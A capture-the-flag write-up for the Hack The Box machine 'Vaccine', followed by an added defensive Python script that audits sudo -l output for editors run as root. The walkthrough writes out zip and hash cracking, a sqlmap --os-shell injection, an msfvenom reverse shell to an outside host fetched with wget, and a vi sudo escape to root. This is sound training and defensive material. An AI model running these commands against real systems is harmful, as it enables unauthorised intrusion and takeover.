Vaccine

An easy box with a SQL injection vulnerability.

Start by adding vaccine.htb to /etc/hosts. After the initial nmap scan we can run a service scan against the three ports we discovered.

  • sudo nmap -sC -sV -O -p21,22,80 vaccine.htb -oN nmap_second

FTP allows anonymous login, so we can grab backup.zip from there. Trying to unzip it, we find it is a password-protected archive containing index.php and style.css.

We can use John's zip2john (zip2john backup.zip > backup.zip.hash) to produce a hash that john can crack. Running john backup.zip.hash gives us the password 741852963.

Checking index.php we find credentials: the username admin and an MD5 password hash, which we can feed to crackstation.net to get qwerty789. Log in as admin.

The next page we come to has a search field. Testing it for injection with sqlmap, we get lucky: sqlmap -u http://vaccine.htb/dashboard.php?search=1 --os-shell --cookie=PHPSESSID=o4htgfqc51canihdh9o93rdc44

We can use this to get a reverse shell on the target.

  • Generate the payload with msfvenom -p linux/x86/meterpreter_reverse_tcp -f elf LHOST=10.10.16.193 LPORT=8765 > rev.elf and wget it over to the target.

After setting up a multi/handler with the matching payload, run ./rev.elf and we get a shell. We could also have read the .ssh directory inside the postgres home dir and grabbed id_rsa. Doing that now for a stable connection.

Inside /var/www/html we find dashboard.php containing the postgres credentials (password P@s5w0rd!), which allow us to run sudo -l:

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

  • sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • followed by :!/bin/sh and we are root.

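From the defender's side, the rule above is the thing to catch before anyone gets this far. The following is an added example (not from the original post) that parses sudo -l style rule lines, flags editors such as vi that keep root privileges when run under sudo, and suggests sudoedit for each; the sample input is the output quoted on this page, and the editor list is an assumption.

```python
import re
from typing import NamedTuple

# Editors that keep sudo's elevated privileges when run as root and can
# be escaped to a shell, as this page shows for vi. Assumed list; extend
# as needed. sudoedit (sudo -e) edits the file without running the
# editor itself as root, which removes that escape.
PRIV_RETAINING_EDITORS = {"vi", "vim", "nano", "ed"}

# Matches one rule line of `sudo -l` output: (runas) [TAG:...] command [args]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"
    r"(?:(?P<tags>(?:[A-Z]+:\s*)+))?"
    r"(?P<cmd>\S+)(?:\s+(?P<args>.*))?$"
)


class Finding(NamedTuple):
    runas: str
    command: str
    args: str
    advice: str


def audit_sudo_rules(sudo_l_output: str) -> list[Finding]:
    """Parse the rule lines of `sudo -l` output and flag editors run as root."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as "User postgres may run ..."
        cmd = m.group("cmd")
        args = (m.group("args") or "").strip()
        base = cmd.rsplit("/", 1)[-1]
        if base in PRIV_RETAINING_EDITORS:
            target = args.split()[0] if args else "<file>"
            findings.append(Finding(m.group("runas"), cmd, args, f"sudoedit {target}"))
    return findings


# Constructed sample: the sudo -l output quoted on this page.
SAMPLE = """User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE):
        print(f"({f.runas}) {f.command} {f.args} -> replace with: {f.advice}")
```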
This post is licensed under CC BY 4.0 by the author.